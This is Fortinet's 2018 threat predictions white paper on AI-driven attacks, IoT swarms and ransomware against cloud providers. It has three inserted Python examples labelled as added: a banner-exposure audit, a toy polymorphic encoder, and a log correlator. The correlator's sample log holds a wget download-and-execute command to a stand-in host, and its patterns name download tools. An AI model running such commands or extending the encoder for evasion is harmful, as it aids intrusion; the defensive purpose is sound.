
FORTIGUARD 2018

THREAT PREDICTIONS

WHITE PAPER
WHITE PAPER: FORTIGUARD 2018 THREAT PREDICTIONS

Change is happening rapidly. It's hard to believe that the first smartphone was introduced only a little over a decade ago, because universal connectivity now affects virtually every aspect of our lives. The rising generation will never know a time when the world around them wasn't filled with connected devices able to immediately solve their problems or meet their needs.

Individuals have a growing expectation of instant access to highly personalized information and services through a variety of interconnected devices. This demand is driving the digital transformation of society. Businesses that want to succeed in this new digital marketplace need to create a culture of adaptability to stay ahead of demand from both consumers and employees. Organizations still in the process of adopting virtualization and the cloud have had to begin transforming their networks yet again with things like machine learning and artificial intelligence in order to accelerate their ability to see, predict, and respond to market trends.

And as with most technological and social change, there is also a growing criminal element looking to exploit the new opportunities that this digital society provides. The proliferation of online devices accessing personal and financial information, and the growing connection of everything – from armies of IoT devices and critical infrastructure in cars, homes, and offices to the rise of smart cities – have also created new disruptive and destructive opportunities for cybercriminals and other threat actors.

THE GROWING THREAT LANDSCAPE

WAR OF THE AI

The cybercriminal marketplace has proven itself very skilled at adopting the latest advances in such things as artificial intelligence in order to more effectively detect and exploit vulnerabilities, evade detection, adapt to complex network environments, and maximize profitability.

Supervised vs Unsupervised Learning

Elon Musk has stated that whatever organization manages to 'master' AI will have access to global control. That's not just hyperbole. Without proper controls in place, truly autonomous and self-learning artificial intelligence would be able to move freely through our hyperconnected digital world, adapt to new digital environments, and access virtually any digital resource.

It sounds like something from a science fiction movie, but a growing number of experts see real risks posed by AI, especially in a world where connectivity has outpaced security, and they are calling for regulations and controls.

Part of the risk is related to the way AI systems learn. Highly supervised incubators can spend years carefully cultivating an artificial intelligence to perform specific tasks in a predictable way. These are usually then integrated into a Centaur Model, where humans work alongside automation and AI.

But even in a supervised environment, small errors in learning models at the beginning can result in very unexpected and even dangerous outcomes. A target shooting comparison helps illustrate this point. If the barrel of a rifle aimed at a target several hundred yards away is off by even a fraction of a millimeter, the shot will miss not only the bull's-eye but probably the entire target. AI systems are orders of magnitude more complex, and responsible researchers are willing to go slowly because they are aiming for accuracy and predictability. Cybercriminals, however, are not so concerned. The unsupervised learning models they are likely to use in developing AI-based attacks, where speed of development matters more than predictability, are especially dangerous and could be devastating. In such scenarios, things can go sideways quickly.

Over the past year, for example, we have seen cybercriminals repeatedly weaponize millions of unsecured IoT devices and use them as a blunt instrument to take out systems and networks, as with Mirai or, more recently, Reaper. As those devices become more sophisticated and attack methodologies become more intelligent, there is real potential to create swarms of compromised IoT devices that would wreak indiscriminate havoc – think Africanized bees.

If the best and brightest of the cybersecurity research community are calling for regulation, you can bet it's because they see that the cybercriminal community is looking seriously at building these things, and is likely to release them unsupervised into the wild.

The best defense against such intelligent and automated threats is an integrated, collaborative, and highly adaptive security fabric. Just as with AI, whoever gets the fabric-based security system right, leveraging things like machine learning and AI, will have a highly aware and proactive defense system better able to keep pace with new automated, self-learning AI-based attacks.

Automation and Machine Learning

We're not talking about future visions or something far down the road. Black hats are already leveraging automation and machine learning in their attack tactics, techniques, and procedures (TTPs). We already see attacks with automated front ends mining for information and vulnerabilities, combined with AI-based analysis to correlate vast amounts of pilfered structured and unstructured data.

Of course, these sorts of strategies require massive amounts of computing power, which is why cybercriminals are already using cloud services and public infrastructure to launch and manage attack campaigns. Cybercriminals have, for example, been using stolen credit card information to buy access to cloud services for many years. Today, most cybercriminal organizations use high performance computing (HPC) for CPU-intensive tasks such as bitcoin mining or cloud-based password cracking. They also use distributed computing and processing to autonomously discover and learn about weak spots in security systems.

We are now seeing the first attempts at automatically generating code to strike at vulnerable targets using techniques such as fingerprinting and blueprinting.

In addition, services like Shodan make it easier than ever for cybercriminals to find potential targets. Shodan is a specialized search engine that indexes the metadata in the service banners returned by online servers and devices. It primarily collects data from web servers on ports 80, 8080, 443, and 8443 (HTTP/HTTPS), but it also searches ports 21 (FTP), 22 (SSH), 23 (Telnet), 161 (SNMP), 5060 (SIP), and 554 (RTSP). It then catalogues every device with a remote interface, including web-enabled servers, network devices, home security systems, webcams, traffic signals, video projectors, routers, home heating systems, and even SCADA systems. Since many of these devices still accept default logins, once a device is located it is often a fairly simple matter to compromise it. The same index works in the defender's favor: searching it for your own address ranges shows exactly what an attacker sees, and the usual fix is to take the management interface off the public internet or, at minimum, change the default credentials.
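What Shodan indexes is just the banner each service returns on connect. The following is an added example, not code from this paper or from Shodan, of turning such banners into an exposure list the way a defender would when checking their own address space: it pulls the product string out of SSH, FTP and HTTP banners on the ports listed above and flags the things an attacker goes for first (cleartext login services, HTTP Basic auth without TLS, SNMP and embedded-device management interfaces reachable from the internet). The sample banners, the documentation-range addresses and the device keyword list are constructed for the example.

```python
"""Banner-metadata exposure check (added example; not Fortinet's or Shodan's code).
Parses the kind of service banners Shodan indexes on the ports named in the text
and flags the exposures an attacker would try first. All banners are constructed."""
import re
from dataclasses import dataclass, field

# Ports listed in the text and the service each normally carries.
PORT_SERVICES = {21: "ftp", 22: "ssh", 23: "telnet", 80: "http", 161: "snmp",
                 443: "https", 554: "rtsp", 5060: "sip", 8080: "http", 8443: "https"}

# Banner fragments that identify a device class commonly shipped with default
# logins. Assumed keyword list for illustration, not a fingerprint database.
EMBEDDED_HINTS = ("webcam", "ip camera", "dvr", "router", "scada", "plc", "thermostat")


@dataclass
class Exposure:
    host: str
    port: int
    service: str
    product: str                       # what the banner advertises, "" if nothing parsable
    findings: list = field(default_factory=list)


def product_from_banner(service: str, banner: str) -> str:
    """Pull the product/version string out of a banner for the given service."""
    if service == "ssh":
        m = re.match(r"SSH-[\d.]+-(\S+)", banner)             # SSH-2.0-OpenSSH_7.4
        return m.group(1) if m else ""
    if service == "ftp":
        m = re.match(r"220[ -]\(?([^\r\n)]+)", banner)         # 220 (vsFTPd 3.0.3)
        return m.group(1).strip() if m else ""
    if service in ("http", "https", "rtsp", "sip"):
        m = re.search(r"^Server:\s*(.+?)\r?$", banner, re.M | re.I)
        return m.group(1).strip() if m else ""
    return banner.splitlines()[0].strip() if banner else ""


def classify(host: str, port: int, banner: str) -> Exposure:
    """One (host, port, banner) observation -> Exposure record with findings."""
    service = PORT_SERVICES.get(port, "unknown")
    exp = Exposure(host, port, service, product_from_banner(service, banner))
    text = banner.lower()
    if service in ("telnet", "ftp"):
        exp.findings.append("cleartext login service reachable")
    if service == "http" and re.search(r"^www-authenticate:\s*basic", banner, re.M | re.I):
        exp.findings.append("HTTP Basic auth without TLS")
    if service == "snmp":
        exp.findings.append("SNMP reachable from the internet")
    if any(hint in text for hint in EMBEDDED_HINTS):
        exp.findings.append("embedded device management interface exposed")
    return exp


def audit(banners) -> dict:
    """Map host -> list of 'port/service: finding' strings, hosts without findings omitted."""
    report = {}
    for host, port, banner in banners:
        exp = classify(host, port, banner)
        if exp.findings:
            report.setdefault(host, []).extend(
                f"{port}/{exp.service}: {f}" for f in exp.findings)
    return report


# Constructed sample banners; hosts are documentation addresses.
SAMPLE_BANNERS = [
    ("192.0.2.10", 22, "SSH-2.0-OpenSSH_7.4\r\n"),
    ("192.0.2.10", 443, "HTTP/1.1 200 OK\r\nServer: nginx/1.12.2\r\n\r\n"),
    ("192.0.2.20", 23, "\r\nDVR login: "),
    ("192.0.2.20", 80, "HTTP/1.1 401 Unauthorized\r\nServer: Boa/0.94.14rc21\r\n"
                       "WWW-Authenticate: Basic realm=\"IP Camera\"\r\n\r\n"),
    ("192.0.2.30", 21, "220 (vsFTPd 3.0.3)\r\n"),
    ("192.0.2.30", 161, "sysDescr: Linux router 2.6.36"),
]

if __name__ == "__main__":
    for host, findings in audit(SAMPLE_BANNERS).items():
        print(host)
        for finding in findings:
            print("  ", finding)
```

Running the same classification over a banner grab of your own perimeter is the cheapest way to see what an attacker sees; anything that lands in the report should either leave the public internet or lose its default credentials.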

Security vendors and researchers already use machine learning to analyze a piece of code and determine whether it is malicious. Sandbox tools bolstered with machine learning, for example, allow us to quickly identify previously unseen threats and dynamically create protections. There is no reason the same approach couldn't be used in the other direction: for mapping networks, finding attack targets, determining where those targets are weak, blueprinting a target to conduct virtual penetration testing, and then building and launching a custom attack. All done at the AI level and fully automated.

We are likely to begin seeing malware written entirely by machines based on automated vulnerability detection and complex data analysis, followed by the development of exploits based on the unique characteristics of the detected weakness. It's a natural evolution of tools that already exist. Polymorphic malware, which has been around for decades, rewrites its own code on each generation to evade signature-based security controls, and can produce more than a million variants per day. But so far this is just based on an algorithm, and there is very little sophistication or control over the output.

Next-gen "morphic malware," however, will use entirely new, customized attacks that are not simply variations based on a static algorithm, but will employ automation and machine learning to tailor them to a unique target while making them far harder to detect and mitigate.

We are also seeing advanced services offered on dark web marketplaces that leverage machine learning. For example, a FUD (fully undetectable) service is now part of several Crime-as-a-Service offerings. It allows criminal developers to upload attack code and malware to an analysis service for a fee and receive a report on whether security tools from different vendors detect it. This lets them refine their malware and strengthen the element of surprise by circumventing the security devices used by the targeted company or government agency.

To do this, these criminal service providers have begun building their own computing clusters, similar to those used by services such as VirusTotal, leveraging their own and hijacked compute resources and stocking them with security tools from a variety of vendors in order to test and refine malware. Unlike VirusTotal, these services never share the submitted samples with the vendors, so the vendors learn nothing from the scan. To shorten the development cycle, it is also now possible to use machine learning to modify code on the fly based on how and what was detected in the lab, making these cybercrime and penetration tools more effective and harder to detect.

BIG PREDICTION: THE RISE OF HIVENETS AND SWARMBOTS

Over the past few years, we have seen the development of predictive software using artificial intelligence techniques. The latest advances in these sorts of tools use swarm technology to leverage massive databases of expert knowledge, comprising billions of constantly updated bits of data, to make accurate predictions. Such systems can be used to offer advice, make medical diagnoses, or increase trading profitability on the stock exchange. This sort of predictive analysis represents an entirely new paradigm for how computing resources will be used to transform our world.

Likewise, we predict that cybercriminals will begin to replace traditional botnets with intelligent clusters of compromised devices built around swarm technology to create more effective attacks. If you think about it, traditional botnets are mindless slaves: they wait for commands from the bot herder (master) before executing an attack. But what if these nodes were able to make autonomous decisions with minimal supervision, use their collective intelligence to solve problems, or simultaneously target multiple vulnerable points in a network using a variety of penetration and exploit techniques?

The result would be a Hivenet instead of a botnet. Such a tool could leverage peer-based self-learning to target vulnerable systems at an unprecedented scale. Hivenets would be able to use swarms of compromised devices, or swarmbots, to simultaneously identify and tackle different attack vectors. Hivenets are especially dangerous because, unlike traditional botnet zombies, individual swarmbots are smart. They are able to talk to each other, take action based on shared local intelligence, use swarm intelligence to act on commands without the bot herder instructing them to do so, and recruit and train new members of the hive. As a result, as a Hivenet identifies and compromises more devices it will be able to grow exponentially, and thereby widen its ability to attack multiple victims simultaneously.

While IoT-based attacks such as Mirai and Reaper are not using swarm technology yet, they already have the footprint necessary. Reaper is especially concerning because it embeds a Lua engine and ships additional Lua scripts. Lua is a lightweight, embeddable scripting language; carrying an interpreter lets the operator push new attack logic to infected devices as scripts rather than re-flashing the binary, so switching from one attack to another is fairly easy. Upgrading this sort of code to leverage emerging swarm behaviors and AI would have devastating consequences.

Responding to a Swarm Outbreak

There is currently very little that can be done to effectively fight off such an attack. Traditional security tools allow organizations to fend off a single or even several attackers at once. But a swarm is a completely different sort of challenge. In many cases, especially sustained multiple DDoS attacks, there is simply not enough mitigation capacity. Even today, with all of our advances in technology, when a swarm of killer bees is headed your way the best solution is to simply run away.

Protecting networks and services, including critical infrastructure, from a swarm attack will require a systematic approach based on identifying potential attack vectors and engineering vulnerabilities out of the network. Simply building in things like redundancy, automated backups, and distributed network segmentation can go a long way towards mitigating the impact of such attacks. The next step is to replace existing security tools with an adaptive security fabric of integrated security devices. Unlike the separate, isolated security devices most organizations have in place, a security fabric is able to:

• See every device across the distributed network
• Detect unknown threats, including the attack patterns used by swarmbots
• Share and correlate threat intelligence in real time to harden systems and repel invaders
• Dynamically segment the network to prevent the lateral spread of infection
• Isolate compromised devices and systems
• Respond to attacks in a coordinated fashion, such as automatically shutting down attack vectors by dynamically reconfiguring the fabric as attack patterns and methods become better defined through real-time correlation of threat intelligence

CLOUD SERVICE PROVIDERS – TARGETED RANSOM AND THE SINGLE POINT OF FAILURE

The next big target for ransomware is likely to be cloud service providers. We have already seen the beginnings of this sort of attack in South Korea, where a hosting provider recently paid a US$1 million ransom to get its services back online. To understand why this is an attractive target for cybercriminals, let's break down how much revenue these services drive, the weak points in the system, and how these big fish are going to be targeted for high-value ransoms.

The financial opportunities are clear. Cloud computing is expected to grow to $162B by 2020, with a compound annual growth rate (CAGR) of 19%. In addition, successfully taking down a cloud provider is a one-to-many opportunity. The complex, hyperconnected networks that cloud providers have developed can produce a single point of failure for dozens or even hundreds of businesses. (Think of Mirai taking out a DNS hosting provider.)

Cloud services are also centralized and therefore present a huge potential attack surface. Rather than hacking businesses individually, criminals able to infiltrate a single cloud environment would potentially have access to data from dozens or hundreds of organizations, or be able to wipe out an entire range of services with a single attack. The disruption or ransom of commercial services represents high value to cybercriminals.

And it's not just businesses that would be affected. Government entities, critical infrastructure, law enforcement, healthcare, and a wide range of industries of all sizes use the cloud – and many of them use the same cloud provider. If a cyberterrorist were able to take down a single major cloud service provider, the results would be devastating.

This isn't new. Cybercriminals have successfully targeted cloud-based web hosting services in the past in order to inject code into multiple high-traffic web domains rather than trying to do so one at a time. With new cloud offerings, these criminals are not only able to continue that sort of attack, but also gain access to things like data and PII (personally identifiable information), which can have high resale value on the dark web. The fact that there is so much more at stake makes cloud providers increasingly tempting targets.

As a result, we predict that cybercriminals will begin to combine AI technologies with multi-vector attacks to scan for, detect, and exploit weaknesses in a cloud provider's environment. Successfully crippling a service that generates millions of dollars a day for the provider, while disrupting service for potentially hundreds or thousands of businesses and tens of thousands or even millions of their customers, would not just represent a massive payday for a criminal organization. It would also undermine the fragile trust that many organizations already have in cloud-based computing, and could have a devastating effect on digital transformation and our digital economy.

HEALTHCARE & CRITICAL INFRASTRUCTURE – AN ARMS RACE

Of all the industries that could be affected by advances in cybercrime techniques, healthcare and critical infrastructure providers continue to be at the top of the list in terms of risk. These organizations are in a difficult position because their networks protect vital services and, quite often, human lives. At the same time, shifting consumer demands are forcing them to adapt to new market pressures, and as a result security can be seen as an inhibitor to success. The pressure to sacrifice security for productivity has left many providers vulnerable. Given the state of cyberthreats today, it is imperative that these organizations act now to shore up their defenses before it's too late.

Part of the challenge is that most critical infrastructure and OT networks are notoriously fragile, and were originally designed to be air-gapped and isolated. But the need to respond at digital speeds to employee and consumer demands has begun to change that, exposing everything (think cloud-enabled SCADA services). Applying security as an afterthought, once a network designed to operate in isolation is connected to the digital world, is rarely very effective.

Because of the high value of these networks, and the potential for devastating results should they be compromised or knocked offline, critical infrastructure and healthcare providers now find themselves in an arms race with cybercrime organizations. This puts them in a difficult position: on the one hand, they are being forced to trust new connected systems to provide both increased intelligence and security; on the other, the risks are real. Complicating matters further, the advances being made by cybercriminals will soon be able to subvert current security technologies. Cyberterrorists, for example, will begin weaponizing cybercrime tools, converting them into militarized malware, or 'Milware,' designed to cause maximum damage to things like critical infrastructure. And once the AI singularity takes place, the offense-versus-defense window (time to breach vs. time to protect) will shrink to a matter of milliseconds rather than the hours or days it takes today.

The security these cloud-connected systems currently have in place will not be enough, which is why it is imperative that organizations migrate to advanced security systems built around quality intelligence, and adopt an integrated security fabric strategy that can see across the distributed network, counter the sophisticated attack systems being developed and deployed by attackers, implement consistent security policy everywhere, and easily integrate advances in both collaboration and AI.

RESPONSE: SYSTEMS WILL BECOME MORE INTELLIGENT AND INTEGRATED – THE RISE OF "EXPERT SYSTEMS"

One critical response to advancements in malware and cybercriminal technologies is the development of "expert systems." An expert system is a collection of integrated software and programmed devices that use artificial intelligence techniques to solve complex problems. For example, expert systems use knowledge bases to offer advice, perform medical diagnoses, or make educated decisions about trading on the stock exchange.

These expert systems cannot operate effectively in isolation. Part of their success depends on different systems operating together to solve complex challenges. We have already begun to see this sort of advancement in military applications. For example, new software designed to function as an expert system now allows individual fighter jets to integrate with each other in order to carry out complex missions more effectively or respond to threats with orchestrated countermeasures. These advanced flight and targeting technologies enable them to make autonomous and semi-autonomous decisions about locating a target, evading an attack, or out-maneuvering an opponent.

Smart cities operate in much the same way, coordinating critical resources to respond to things like traffic, emergency services, or even energy consumption. We are also beginning to see business and public sector systems overlap to ensure that things like energy, water, or other critical infrastructure systems are able to respond more effectively and efficiently to the needs of manufacturing floors, agriculture, or energy production. At the same time, cyberterrorism and business-oriented cybercrime are beginning to converge as their tools and techniques overlap. For example, disrupting a business can have political implications, and vice versa.

This is why expert security systems need to be developed further to enable the critical sharing of intelligence, allowing security architectures to work in concert to root out and stop advanced threats. In addition to integrating multi-cloud and mobile devices, unsegmented and unsecured networks need to be actively monitored and secured. To make this happen, isolated security devices will need to be identified and replaced with those designed to operate as part of a more complex, integrated system.

One of the biggest challenges will be the last mile of security: finding the will and the way to automate basic security hygiene, such as patch-and-replace, hardening systems, and implementing two-factor authentication. Complex, multi-cloud ecosystems and hyperconverged networks that span physical and virtual environments make these basic security practices extremely difficult to carry out. AI and automation need to fill this gap by replacing the basic security functions and day-to-day tasks currently performed by people with an integrated expert security system that is able to:

• Determine device vulnerabilities, track and patch devices, and apply security protocols or an IPS policy to protect vulnerable devices until a patch is available or they can be replaced
• Address device misconfiguration, another huge problem. Expert systems need to be able to configure both security and network devices, monitor those configurations, and make appropriate changes as the network environments they operate in continue to shift
• Automatically rank devices based on levels of trust and dynamically segment traffic, especially from the growing number of IoT devices, even in highly elastic environments. They then need to be able to identify and isolate compromised devices to stop the spread of infection and initiate remediation

RESPONSE: ADVANCED CTI (CYBER THREAT INTELLIGENCE)

The days of being able to detect and thwart an attack using an isolated firewall positioned at a network access point are over. IP addresses, malware, traffic behaviors, and domains are the basic building blocks cybercriminals work with, and they can be easily changed and moved to make them harder to detect. Add things like multi-vector attacks, polymorphic malware, and the ability to masquerade as legitimate network traffic, and most traditional security solutions quickly become virtually obsolete.

Instead, threat intelligence needs to contextualize information beyond IP addresses and file hashes and focus on things that are harder for cybercriminals to change. One of these is attack patterns and techniques. By aggregating and correlating intelligence from tightly integrated fabric solutions that span the distributed network with real-time data from global threat feeds, sophisticated analysis will be able to provide a fingerprint of malicious behavior that can be quickly identified and tracked.

Finally, all threat actors have unique behaviors, signatures, and patterns. Once you are able to identify and isolate different threat actors based on the fingerprint of their criminal activity, organizations will be able to predict malicious behavior based on historical trends, detect attacks in their very earliest stages, and dynamically implement effective countermeasures based on known attack stages.

CONCLUSION

Make no mistake: cybercriminals are organized, well funded, and highly motivated. They are deploying advanced malware, leveraging cloud-based computing resources, and developing cutting-edge tools based on AI and machine learning, not only to circumvent advanced security defenses but also to widen the scope and scale of their attacks. There are still wide-open, greenfield opportunities for enterprising criminals, driven by such things as cloud computing and IoT, that are just waiting for the right tools to be compromised.

As a result, over the next couple of years we will see the attack surface expand through the use of automation and tools able to make autonomous or semi-autonomous decisions. The challenge is that we are at a very delicate moment in our transformation to a digital society and economy. Once we arrive at the singularity – when AI takes on a life of its own without human interaction – massive disruptions caused by autonomous malware could have devastating implications and permanently reshape our future.

Organizations need to respond by insisting that manufacturers develop more and better security controls built around integrated security technologies, quality threat intelligence, open standards, and dynamically configurable security fabrics. Security will also need to operate at digital speeds, which means automating security responses and applying intelligence and self-learning so that networks can make effective, autonomous decisions. This will allow us to replace organically grown, accidental network architectures with intentional design that can not only withstand serious and sustained attacks but also automatically adapt and respond.

Like it or not, this is a winner-takes-all arms race. Organizations that fail to prepare now may not be able to catch up once it moves to the next level of sophistication.
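The CTI section's point that file hashes and byte signatures are cheap for an attacker to invalidate, and the earlier note that polymorphic malware already turns out a million variants a day from a plain algorithm, can be shown in a few lines. The following is an added example, not code from this paper: a toy polymorphic engine re-encodes a harmless, constructed stand-in payload under a fresh key each generation, so every variant has a new SHA-256 and no longer contains the bytes a signature scanner keys on. A detector that first emulates the decoder stub and only then applies the same signature still catches every variant, because the stub layout is the part of the sample that is hard to change. The payload, the signature and the stub format are assumptions for the example.

```python
"""Hashes and byte signatures versus decoder-stub emulation (added example;
not code from the paper). A toy polymorphic engine re-encodes a harmless
constructed stand-in payload under a fresh key per generation."""
import hashlib
import random

# Harmless stand-in for a malicious body; a real sample would be machine code.
PAYLOAD = b"CONSTRUCTED-SAMPLE: connect 198.51.100.9:6667 and await commands"
SIGNATURE = b"await commands"   # byte pattern a static signature scanner keys on
STUB_MAGIC = b"STUB"            # marks the assumed decoder-stub layout


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def mutate(payload: bytes, key: bytes) -> bytes:
    """One generation: [magic][key length][key][XOR-encoded body].
    Key bytes are non-zero so every payload byte actually changes."""
    assert key and all(k != 0 for k in key)
    return STUB_MAGIC + bytes([len(key)]) + key + xor_bytes(payload, key)


def generate_variants(payload: bytes, count: int, seed: int = 2018) -> list:
    """`count` variants under distinct 16-byte keys; seeded so runs are reproducible."""
    rng = random.Random(seed)
    return [mutate(payload, bytes(rng.randrange(1, 256) for _ in range(16)))
            for _ in range(count)]


def signature_hit(sample: bytes) -> bool:
    """Static scanner: the original bytes must appear verbatim."""
    return SIGNATURE in sample


def emulated_hit(sample: bytes) -> bool:
    """Emulate the stub (undo its encoding), then apply the same signature
    to the recovered body. Malformed stubs are rejected rather than guessed at."""
    if not sample.startswith(STUB_MAGIC) or len(sample) < len(STUB_MAGIC) + 1:
        return False
    klen = sample[len(STUB_MAGIC)]
    key = sample[len(STUB_MAGIC) + 1:len(STUB_MAGIC) + 1 + klen]
    if klen == 0 or len(key) != klen:
        return False
    body = xor_bytes(sample[len(STUB_MAGIC) + 1 + klen:], key)
    return SIGNATURE in body


def compare(count: int = 5) -> dict:
    """How each detection approach fares across `count` fresh variants."""
    variants = generate_variants(PAYLOAD, count)
    return {
        "distinct_hashes": len({hashlib.sha256(v).hexdigest() for v in variants}),
        "signature_hits": sum(signature_hit(v) for v in variants),
        "emulated_hits": sum(emulated_hit(v) for v in variants),
    }


if __name__ == "__main__":
    print(compare())   # {'distinct_hashes': 5, 'signature_hits': 0, 'emulated_hits': 5}
```

The hash and the raw signature are indicators the attacker discards for free on every build; the decoder structure and the behavior of the decoded body are what an attacker has to re-engineer, which is why the intelligence worth sharing describes those.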
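The CTI section also argues that attack patterns and techniques are harder to change than addresses and hashes, and that known attack stages allow an intrusion to be caught early. The following is an added example, not code from this paper or from any Fortinet product, of that idea applied to a constructed log: it correlates events per attacker-victim pair into the stage sequence an IoT worm such as Mirai is known to follow (credential guessing on Telnet, login, payload fetched with wget or tftp, payload executed, victim scanning onward), and reports the furthest stage reached. The log format, field names, thresholds and addresses are assumptions for the example; swapping the attacker's address for another one changes nothing in the result.

```python
"""Attack-stage correlation over constructed log lines (added example; not
code from the paper or any product). Rules key on what the attacker does,
not on which addresses or hashes are involved. Log format is assumed."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"event=(?P<event>\w+)(?: (?P<rest>.*))?$")
CMD_RE = re.compile(r'cmd="(?P<cmd>[^"]*)"')

# Ordered attack stages; severity is the furthest stage reached.
STAGES = ("credential_guessing", "initial_access", "payload_download",
          "payload_execution", "propagation")
FAIL_THRESHOLD = 3          # failed logins before it counts as guessing (assumed)
LOGIN_PORTS = {"22", "23"}  # SSH and Telnet


def parse_line(line: str):
    """One log line -> dict of fields, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    c = CMD_RE.search(rec.get("rest") or "")
    rec["cmd"] = c.group("cmd") if c else ""
    return rec


def correlate(lines):
    """Return {(attacker, victim): [stages, in the order they were reached]}."""
    fails = defaultdict(int)
    stages = defaultdict(list)
    victims = {}   # victim host -> (attacker, victim) session that compromised it

    def reach(key, stage):
        if stage not in stages[key]:
            stages[key].append(stage)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["src"], rec["dst"])
        ev, cmd = rec["event"], rec["cmd"]
        if ev == "auth_fail" and rec["dport"] in LOGIN_PORTS:
            fails[key] += 1
            if fails[key] >= FAIL_THRESHOLD:
                reach(key, "credential_guessing")
        elif ev == "auth_ok" and "credential_guessing" in stages.get(key, ()):
            reach(key, "initial_access")        # a guessed login succeeded
            victims[rec["dst"]] = key
        elif ev == "cmd" and key in stages:     # only sessions already flagged
            if re.search(r"\b(wget|curl|tftp|ftpget)\b", cmd):
                reach(key, "payload_download")
            if re.search(r"chmod \+x|(^|[;&|]\s*)/tmp/\S+", cmd):
                reach(key, "payload_execution")
        elif ev == "connect" and rec["src"] in victims and rec["dport"] in LOGIN_PORTS:
            reach(victims[rec["src"]], "propagation")   # victim now scanning outward
    return dict(stages)


def severity(stage_list):
    """Furthest stage reached, or None when nothing matched."""
    return max(stage_list, key=STAGES.index) if stage_list else None


# Constructed sample log; addresses are documentation ranges. The last two lines
# are a legitimate SSH login with no failed attempts and must not be flagged.
SAMPLE_LOG = """
2017-11-20T10:01:02Z src=203.0.113.7 dst=192.0.2.20 dport=23 event=auth_fail user=root
2017-11-20T10:01:02Z src=203.0.113.7 dst=192.0.2.20 dport=23 event=auth_fail user=admin
2017-11-20T10:01:03Z src=203.0.113.7 dst=192.0.2.20 dport=23 event=auth_fail user=support
2017-11-20T10:01:03Z src=203.0.113.7 dst=192.0.2.20 dport=23 event=auth_ok user=admin
2017-11-20T10:01:04Z src=203.0.113.7 dst=192.0.2.20 dport=23 event=cmd cmd="cd /tmp; wget http://198.51.100.9/arm7 -O .x"
2017-11-20T10:01:05Z src=203.0.113.7 dst=192.0.2.20 dport=23 event=cmd cmd="chmod +x .x; ./.x"
2017-11-20T10:01:09Z src=192.0.2.20 dst=192.0.2.77 dport=23 event=connect
2017-11-20T10:01:09Z src=192.0.2.20 dst=192.0.2.78 dport=23 event=connect
2017-11-20T10:05:00Z src=198.51.100.4 dst=192.0.2.10 dport=22 event=auth_ok user=ops
2017-11-20T10:05:01Z src=198.51.100.4 dst=192.0.2.10 dport=22 event=cmd cmd="uptime"
""".strip().splitlines()

if __name__ == "__main__":
    for key, reached in correlate(SAMPLE_LOG).items():
        print(key, severity(reached), reached)
```

The first stage fires on the third failed login, before anything has been downloaded, which is the "earliest stages" detection the text asks for; each later stage raises the severity, and the same rules fire unchanged when the attacker rotates to a new address or a freshly packed payload.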

GLOBAL HEADQUARTERS: Fortinet Inc., 899 Kifer Road, Sunnyvale, CA 94086, United States. Tel: +1.408.235.7700
EMEA SALES OFFICE: 905 rue Albert Einstein, 06560 Valbonne, France. Tel: +33.4.8987.0500
APAC SALES OFFICE: 300 Beach Road 20-01, The Concourse, Singapore 199555. Tel: +65.6513.3730
LATIN AMERICA HEADQUARTERS: Sawgrass Lakes Center, 13450 W. Sunrise Blvd., Suite 430, Sunrise, FL 33323. Tel: +1.954.368.9990
www.fortinet.com/sales

Copyright © 2017 Fortinet, Inc. All rights reserved. Fortinet®, FortiGate®, FortiCare® and FortiGuard®, and certain other marks are registered trademarks of Fortinet, Inc., and other Fortinet names herein may also be registered and/or common law trademarks of Fortinet. All other product or company names may be trademarks of their respective owners. Performance and other metrics contained herein were attained in internal lab tests under ideal conditions, and actual performance and other results may vary. Network variables, different network environments and other conditions may affect performance results. Nothing herein represents any binding commitment by Fortinet, and Fortinet disclaims all warranties, whether express or implied, except to the extent Fortinet enters a binding written contract, signed by Fortinet's General Counsel, with a purchaser that expressly warrants that the identified product will perform according to certain expressly-identified performance metrics and, in such event, only the specific performance metrics expressly identified in such binding written contract shall be binding on Fortinet. For absolute clarity, any such warranty will be limited to performance in the same ideal conditions as in Fortinet's internal lab tests. Fortinet disclaims in full any covenants, representations, and guarantees pursuant hereto, whether express or implied. Fortinet reserves the right to change, modify, transfer, or otherwise revise this publication without notice, and the most current version of the publication shall be applicable.

141670 0 A4 EN November 20, 2017
